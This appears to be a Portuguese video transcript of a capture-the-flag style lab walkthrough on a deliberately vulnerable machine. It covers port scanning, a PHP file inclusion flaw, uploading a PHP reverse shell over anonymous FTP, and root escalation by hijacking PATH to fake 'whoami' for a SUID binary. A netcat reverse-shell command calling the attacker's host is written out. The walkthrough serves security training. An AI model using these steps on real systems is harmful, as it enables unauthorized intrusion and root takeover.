Fala pessoal, vamos começar aqui a nossa 22ª máquina, inclusive NIS 1. Essa máquina aqui ela não tem vulnerabilidades muito críticas aqui no sentido de a gente achar exploit para elas e tal, é mais misconfiguration, mas vai ser divertido a gente fazer essa máquina aqui. A gente vai ter que fazer uma enumeração aqui do serviço, né? Eu já peguei o IP dela aqui, na minha infra ela pegou 92.68.241. Então, quando você abre ela de cara aqui no browser, você já vê uma página default do Debian aqui, né? Do Apache 2. Então, essa máquina aqui, ela vai estar rodando um VSFTPD 303 e dentro desse servidor web que está rodando nela, a gente vai encontrar um ponto aqui onde a gente consegue fazer um LFI e nesse LFI a gente vai chamar os logs do VSFTPD, né? Vai chamar os arquivos de configuração do VSFTPD e a gente vai conseguir ver qual que é o diretório raiz dele. Então, como ele tem um usuário anônimo liberado, né? A gente vai inserir um comando nesse usuário anônimo e abrir a sessão. Após a exploração dessa máquina aqui, é uma coisa que é muito difícil de acontecer na vida real, porque os administradores não são tão bobos assim, né, das administradores, esses admins aí. Mas o que acontece? O cara que administra essa máquina aqui, ele criou um código em C para fazer com que a hora que o usuário, o Tom ali, executasse o código dele compilado, ele conseguisse receber uma shell de root. E a forma que ele valida se o tom é o tom mesmo, ele só olha ele dá um Ruami, né? Então então esse Ruamai mostra que ele é o tom e então ele permite o acesso de root. Vocês já vão ver como é que a gente vai fazer para explorar esse cara aí. Então a gente pode escanear essa máquina aqui para ver o que está rodando de portas aqui, né? Sudo nmap-szinho vzão -p- para escanear todas as 65.535 portas, -v de verboso, sv para ver a versão dos serviços, né? 192.68.2.41. Deixar ele rodar aqui. Olha, ele já viu aqui a porta 8080 aberta, a porta 80, né, a 22 e a 21. Já vamos bater aqui no browser para ver o que é essa 8080. Ah, não, nesse caso aqui tá rodando essa 8080 porque eu abri o Simple Server lá na primeira vez que eu fiz a exploração aqui e não voltei o snapshot. Na de vocês não vai estar 8080 aberto, tá? Só 80, a 22 e a 21 mesmo. Então, a PCCH 79, né, o VSFTPD 303 e o HTTPD. Você pode procurar aqui no Search Exploit VSFTPD. Não lembro quais são as versões que tem vulnerabilidade, é a 2.5 e a 2.3. A gente pode tentar logar aqui, né, no FTP 192.68.2.41. Então você pode tentar usuário anônimos, né? Sem senha, ó, ele conseguiu se logar. Então ele tem aqui o diretório pub, não tem nada dentro do diretório pub também. A gente já viu que a gente consegue se logar nesse cara. Então enquanto a gente navega aqui, né, nesse cara, você pode fazer uma enumeração aí, rodar um dirb, né? Vamos ver se a gente acha algum arquivo aqui dentro. dirb http 192.68.2.41 usar wordlist /usr share wordlists dirb vamos usar big.txt. Já achou o manual /javascript /robots.txt server status. Ele está entrando no JavaScript, deixa eu deixar ele rodando aqui. Então vamos tentar requisitar aqui o robots.txt, ver o que a gente acha. Ó, ele está falando aqui que a gente não é um engine de busca, né? E que a gente não pode ler aqui então o robots.txt. Então se você procurar aqui no Google aqui, Google Bot, Google Bot User Agent.
Você vai ver que o Googlebot, o nome do user agent do Googlebot aqui, ó, é Googlebot. Então, como é que ele sabe que a gente não é o Google aqui requisitando, né? Ou que a gente não é algum tipo de crawler, né, requisitando ele aqui? Porque o nosso user agent, ele é a assinatura aqui do nosso browser, né? Então, ele tá demonstrando que é um Chrome aqui, que está rodando, né, dentro de um Linux. Então, isso vai estar escrito lá no user agent. Então a gente pode fazer, poderia jogar isso lá no Burp, né? E trocar o user agent lá no Burp, mas a gente só quer saber o que tem aqui no robots.txt, né? Então a gente pode dar um CURL, a gente passar aqui o menos H de header, né? H maiúsculo. Então a gente passa o user agent, a gente pode chamar ele de Googlebot. No http dois pontos barra barra 192.68.2.41 barra robots.txt. Menos V de verboso aqui. Então, ó, ele conseguiu fazer a requisição, ó, porque agora ele viu que o user agent era do Googlebot. E ele falou aqui, ó, tem um disallow secret underline information. Então, a gente já viu, né, para que serve o robots.txt, a gente já conversou sobre isso antes. Então, a gente pode acessar aqui o diretório que a gente viu ali que estava oculto ali, tinha um desallow ali no Secret Information. Então aqui ele tem, né, uma explicação aqui do que é uma transferência de zona de DNS, né? Então não dá para a gente fazer isso nessa máquina, porque não tem nenhum DNS rodando ali, a gente viu as portas abertas. Mas e se você escolhe a linguagem aqui do que ele tá escrevendo aqui para te ensinar sobre transferência de zona de DNS, ele inclui aqui, ó, o es.php. Então aí a gente já presume que ele está fazendo um include, né, desse es.php e a gente pode incluir outro arquivo aqui no server. Então, se a gente incluir o clássico, né, barra etc pswd, ele conseguiu incluir aqui o etc pswd. Você pode tentar abrir arquivo de log e tal para poder fazer um log poisoning, mas ele não vai conseguir porque ele não tem permissão de leitura nos arquivos de log. Lembra que a gente viu que era um VSTPD 303 que estava rodando nessa máquina? Então a gente pode procurar arquivos de configuração desse cara para a gente conseguir enumerar mais informações sobre aonde está indo esse FTP. Porque daí qual que é o pensamento, né? Se você conseguiu acessar o FTP como usuário anônimo, você consegue jogar um arquivo para dentro do server. E se você está conseguindo fazer um LFI aqui no server, você consegue ler o arquivo que você jogou lá para o server. Logo, você pode criar a tua shell, né? E com essa shell você executar ela aqui no browser, conseguindo então abrir aí a sessão, né, invadir o servidor. Então é simples, né? Mas é só uma questão de você ter esse raciocínio de como que você vai fazer para inserir a tua shell, né, e executar a sua shell. Então o processo, vocês já repararam que é sempre esse, procurar um local onde a gente vai incluir um comando ou algum tipo de arquivo que vai fazer a gente se conectar remotamente, a gente vai chamar esse arquivo e vai se conectar remotamente. Então aqui nesse caso, né, geralmente o cara roda lá o scan, vê que não tem vulnerabilidade nos serviços que estão rodando, já fica sem saber o que fazer, né? Então às vezes é mais você ter esse mindset aí de para onde que eu vou seguir, né? E como é que eu vou, o que que eu preciso fazer? Você tem que pensar assim, o que que é o meu objetivo? É conseguir um acesso remoto nesse servidor, né? Como é que eu vou conseguir esse acesso? Eu vou ter que inserir em algum lugar, né, alguma shell para conseguir se conectar nele. Então, aqui a gente viu que consegue incluir arquivos. Então, se você procurar mais sobre VSFTPD, tem alguns tutoriais de configuração. Então, aqui na própria biblioteca, né, aqui no Linux from Scratch, ele tem uns artigos aqui, tá aqui na descrição para vocês. Tá? Ele mostra como é que faz a configuração do VSTPD, né? E uma coisa legal aqui, ó, que ele mostra aqui no etc vstpd.conf, tem é o arquivo de configuração do VSTPD, VSFTPD. Então, o que que a gente precisa saber? A gente precisa saber aonde que é a raiz do VSFTPD que está rodando para a gente poder inserir o arquivo aqui dentro do VSTPD e rodar ele aqui no browser. Então, se a gente chamar esse cara aqui, ó, vsftpd.conf, aqui dentro, né, do nosso LFI, ó, ele trouxe
o arquivo de configuração do VSFTPD. Podia ser que não tivesse permissão de leitura, tá? Daí a gente ia ter que tentar de outra forma, né? Mas aqui nesse caso a gente conseguiu ler esse arquivo. Então ele é um arquivo bem grande, cheio de coisa aqui. Mas aqui no final, ó, ele está mostrando aqui, ó, que o diretório de root é em /var/ftp. Então o que acontece? Como a gente sabe qual é o diretório de root, né? Aqui, ó, no FTPD, se a gente der um dir, opa, já desconectou. Anonymous. Sem senha, né? Se der um pwd aqui, por exemplo, ó, ele mostra que ele já tá, que ele está na raiz do diretório do FTP. E a gente viu aqui no arquivo de configuração que a raiz é /var/ftp. Então, a gente jogando um arquivo aqui para dentro, né? Ó, aqui ele tem o pub ali. Se você tentar escrever direto aqui na raiz, ele não vai deixar. Então, você pode ir navegar até o pub. E aqui você pode inserir um arquivo. Então eu vou criar aqui uma shell em PHP, né? Porque a gente presume que talvez esteja rodando um PHP nesse browser. Se não tiver, as coisas já começam a ficar mais difíceis também. Mas vamos tentar a gente vai tentar com PHP, né? Eu vou chamar isso de file01.php. Aqui a gente vai inserir então o nosso PHP. Exec. NC 192.68.2.1, que é o IP aqui do meu Kali, na porta 443, "-e /bin /ch". Vamos ver se vai funcionar dessa forma. Se não funcionar, a gente faz de outro jeito. Beleza, então aqui a gente faz um put para enviar o arquivo file01.php. Ele mandou o arquivo para lá. Então aqui a gente pode startar nossa shell, nosso handler, né? nc sudo nc-lvp na 443. Então aqui agora, ó, a gente viu que é /var/ftp, a gente pode chamar ele aqui, ó, /var/ftp barra, qual que é a pastinha que a gente escreveu aqui? Na pasta pub. /pub /file01.php. Ele não conseguiu abrir a sessão. Então pode ser que a nossa shell não funcionou. Às vezes não funciona você botar o PHP, ou botar o NC com o "-e" lá no final, né? Então vamos pegar aqui no Pentest Monkey uma shell aqui. Vou tentar com essa de bash aqui mesmo para ver se é o... Talvez seja o próprio exec que não esteja funcionando também. Às vezes ele tem algum tipo, né, de tratamento para isso, né? Vamos sair aqui. Em file.php. Um 92.168.2.1, né, 443. Anonymous cdpub put file.php. Escreveu lá, então vamos tentar chamar ela aqui agora para ver se vai. Não foi também. Então você vai testando, né? Aqui, ó, vamos utilizar aquela shell que já tem aqui no Kali. cp/sr share web shells php reverse shell.
Vou dar um pontinho para copiar para cá, barra arquivo.php. Vim arquivo.php. Essa shell ela faz a conexão reversa utilizando o socket, né? A gente já viu ela antes aqui também. 192.68.2.1, que é o IP aqui do Kali, né? 443. cdpub. Opa. Esqueci de botar o usuário anônimo. cdpub. Put arquivo.php. Agora a gente chama aqui o arquivo.php e a gente conseguiu então aqui abrir, né, a nossa shell. Já posso sair aqui. Então a gente pegou aqui o nosso usuário www.data, né? Para a gente fazer aí a numeração dentro do server, né, para fazer a pós-exploração, eu vi gente perguntando lá no grupo sobre utilizar o linha num, sobre, né, utilizar o Limpias e outras ferramentas assim. Cara, o mais importante é você saber procurar dentro do server o que que você vai explorar, né? Procurar que tipo de aplicação que está rodando, né? Procurar arquivos que você consegue escrever, né? Com arquivos que tenham permissão de root que você consegue escrever, né? A gente já fez isso aqui antes. Para fazer esse tipo de busca, você escreve aqui, você pode usar o find para buscar, né? Tudo que tiver na raiz com o "-perm", que são as permissões, né? Menos "-u" igual a "s", que é para mostrar arquivos que tenham permissão, né, de root, que a gente consiga utilizá-los, menos "type" para passar o tipo, um "f" de file, né, que a gente quer ver arquivos, e o 2 aqui é para pegar o standard error e jogar para /dev /null. Nesse caso ele vai mostrar, né, ó, um monte de arquivos aqui que a gente consegue possivelmente utilizá-los. Então, né, nesse tipo de enumeração que você vai fazendo, você vai procurando coisas que você pode usar, processos que estão rodando na máquina. Não adianta você sair rodando um monte de ferramenta automatizada assim, que vai aparecer um monte de resultados, e se você não entende o que, que são o porquê daqueles resultados, não vai fazer sentido. Então, por exemplo, teve máquina que a gente fez após exploração que a gente viu que estava rodando um serviço como localhost e a gente fez, né, o pivoting para conseguir rodar aquele serviço, né, explorar aquele serviço. Para saber disso, você só precisava ver quais são as portas que estão abertas na máquina ali, quais conexões que ela está escutando e tal, né? Então, você enumerando dentro da própria máquina. Então, você não precisava rodar aquele monte de coisa do Linenum para poder só descobrir isso, né? Então, aqui nesse caso, por exemplo, ó, tem um arquivo aqui, ó, que ele tá rodando nessa máquina. Ó, dentro do home Tom tem um root shell aqui, ó, que ele executa como root. É só um arquivo que vai ser esse que a gente vai explorar, né? E a gente encontrou ele só procurando arquivos que tem permissão de root. Então, tipo, você não precisa sair rodando 1 milhão de ferramentas para encontrar o que você vai explorar, né? Igual na outra máquina que a gente explorou o ServView, né? A máquina anterior aí. A gente viu que estava rodando aquela ferramenta e a gente procurou um exploit para aquela ferramenta, encontrou e explorou, né, uma vulnerabilidade nela. Então, tipo, cada máquina vai ter alguma coisa rodando dentro que talvez esteja vulnerável. Às vezes você não vai achar nada também, depende, né? Então, e aquela coisa de procurar vulnerabilidade em kernel e explorar kernel, né? Vocês já viram nas máquinas anteriores aqui a gente crashando a máquina por causa da exploração do kernel e tal. Então, é uma coisa que a gente também não costuma não sair fazendo assim à torta e à direito, né? Então aqui a gente viu que no /home /tom ele tem um arquivo chamado root shell. Então, se a gente for em /home /tom, ele tem tanto um binário aqui root shell, né? Se dá um type nele aqui, deixa eu ver se vai funcionar. Root shell. Não. Aqui o root shell, se você for ler ele aqui, ó, você vai ver que ele é um binário, ó, ele tá compilado, né? Só que aqui dentro do próprio diretório tem o root shell.c, então que é o arquivo descompilado. Se você ler aqui o root shell.c,
O nome já explica muita coisa, né? Mas aqui, ó, você lendo ele, você vê que o cara, ele faz aqui, ó, ele imprime na tela que ele está checando se você realmente é o Tom. Aí se for, aí ele abre aqui o Who Am I, né? E a resposta do Who Am I, se for igual a Tom, né? Ele vai então executar um SH aqui para você como root. Isso é óbvio que não é uma boa prática, né? Mas a ideia aqui do sysadmin provavelmente foi deixar um executável aqui que facilitasse na hora do Tom aqui poder utilizar o sistema como root. Então, ao invés dele configurar o sudo lá pro Tom, ele achou que seria mais inteligente fazer um código assim, né, e fazer um binário ali em C que permitisse ele se tornar root, né, depois que checasse que ele realmente é o Tom. O que não faz o menor sentido, né? Mas enfim. Então agora que a gente descobriu isso, né, que ele está só simplesmente fazendo um whoami aqui, ó, para executando um whoami para poder ver se eu sou o Tom, o que que o whoami faz, né? Ele é lá no se você for lá no barra bin, barra whoami, acho que é esse o diretório dele, deixa eu ver se which whoami. Não spawnei a shell aqui. Bom, cd barra bin, opa, ls whoami, vamos ver se está aqui. É isso aí mesmo, barra bin barra whoami. Então o binário do whoami, né, a execução dele está aqui no barra bin barra whoami. Então, mas o que acontece? No Linux, né, tem as variáveis de ambiente. Até deixei aqui no link para vocês darem uma lida sobre. E nessas variáveis de ambiente, né, o patch aqui no Linux, não vão confundir patch minúsculo, né, que é o patch onde você está, como se dá um pwd, por exemplo, ele mostra o patch, que é o diretório onde você está. Mas o patch maiúsculo, assim, ó, ele se refere, né, às variáveis de ambiente aqui dentro do Linux. Então, se a gente der um echo e chamar essa variável aqui, ó, patch, ele vai mostrar o local onde estão todos os binários aí, né, nessa máquina. Então, o que acontece? Quando você digita whoami aqui, o que que ele faz? Ele vai, né, dentro desses diretórios que estão descritos aqui e executa, por exemplo, aqui está o barra bin, ó, né? Então ele executa o barra bin barra whoami e ele consegue trazer aqui executar o whoami, né? Que é assim que ele facilita aqui no Linux para buscar na linha de comando, então alguns executáveis aqui dentro. Então a gente pode escrever aqui nessa variável do pet temporariamente, né? Então aqui nesse link ele mostra como você altera a variável do pet. Ó. Então se você quiser inserir um diretório no pet, você pode dar aqui um export, né? E export pet igual a pet e o diretório que você quer aqui, ó. Então a gente vai inserir então dentro do patch, né, um lugar onde a gente consiga escrever para a gente mudar aqui o whoami. Então primeiro a gente pode vir aqui no TMP e a gente pode fazer criar um arquivo aqui, onde a gente vai fazer esse arquivo responder, né, o nome do usuário que ele está validando ali naquele arquivinho que a gente viu de C lá. Tá lá em cima, não vou subir mais. Mas como é que ele valida? Ele dá um whoami se a resposta for Tom, que é o usuário, né? Ele permite então que execute o script. Então para vocês verem aqui, deixa eu voltar lá que é mais fácil. Home barra Tom. A gente sabe que o nome do usuário é Tom. Se você der um ls-lha aqui, você vai ver que o root shell ele tem permissão de root, mas a gente tem permissão de executar ele. Então, se você executar o root shell, ele vai checar se eu sou o Tom. Não, ele falou, não, você é o www-data. Ou seja, ele só está executando mesmo o whoami. Então, se a gente vier aqui no TMP e criar um arquivo que imprima Tom ao invés de www-data, né? A gente pode usar o echo aqui e utilizar a linguagem C aqui, mandar um printf tom. Opa, deixa eu trocar e botar uma aspas simples aqui. Printf tom
É minúsculo mesmo o tom, né? É minúsculo. Printf tom. Dentro do arquivo chamado Ruamai, a ideia é permissão 777 aqui para o Ruamai. Se você executar ele, deixa eu ver se vai funcionar assim. Ele escreveu o tom aqui, ó, tá vendo? Então funcionou, né? O printf ali, né? É em bash, né? Não é em C. Ele escreveu o tom. Então o que acontece? Agora a gente precisa fazer, a hora que o patch executar o Ruamai, ele escrever tom ao invés de escrever o nome do nosso usuário, né? Então, como é que a gente pode fazer isso? A gente pode dar um export aqui. E o export ele vai escrever temporariamente só aqui nessa variável de ambiente, tá? Então, você pode dar um export patch aqui, ó, igual a barra tmp, que é o diretório onde está o nosso ruamai falso ali, né? E a gente pode pôr aqui, então, o patch, que é a variável, né? Deixa eu só ver a sintaxe aqui. Ó, dessa forma aqui. Então a gente dá dois pontos, patch igual tmp, dois pontos, patch. Então se a gente der agora um echo patch para ver de novo a variável do patch, ó, o primeiro que aparece aqui é o barra tmp, tá vendo? Então agora se você der um ruamai, ele está dizendo que a gente é o tom, ó, tá vendo? Ele não está mais aparecendo que a gente é o www-data, porque o primeiro lugar que ele vai consultar, né, é aqui dentro, aonde está o ruamai quando você executa é no patch. Então, como a gente fez o scriptzinho aqui que escreve tom na tela, né, e chamou ele com no lugar do Ruamai aqui no TMP, ele escreveu o tom aqui. Então, agora se você vier no barra home, barra tom, opa, barra home, barra tom, e você executar aqui o root shell, você agora está aqui com o usuário root, ó. Então, é claro que realmente é muito difícil de algum administrador de Linux, ao invés de utilizar o sudo ali, criar uma estratégia meio louca dessa, né, de permitir que ser desenvolvido um script ali para te permitir acessar as coisas como root. Hoje em dia ninguém mais faz esse tipo de loucura, né? Mas enfim, é só para vocês conhecerem um pouco aí sobre o patch, né? E essa máquina ela foi bem simples, né? Bem tranquila para a gente dar uma descansada na cabeça aí, que está sendo bem difícil as máquinas, né? Então, dei uma pesquisada aí sobre o patch, entendo bem como é que ele funciona. E essa máquina ela foi toda baseada em misconfiguration, né? Então, toda baseada em configurações falhas aí na máquina, né? Então, misconfiguration você vai achar bastante na vida real. Então, aí mostra, né, a importância de você fazer aí as configurações corretas dentro dos servidores, né? Você, quando eu digo você, eu digo o sysadmin. Enfim, aqui embaixo na descrição está o material de apoio, tem pouca coisa aí para estudar hoje. Porém, também está o link da máquina de amanhã aqui embaixo. Então, se vocês tiverem alguma dúvida, manda mensagem lá no grupo. Não esqueçam de se inscrever aqui no canal. Espero que vocês estejam gostando dos vídeos e até a próxima aí, pessoal.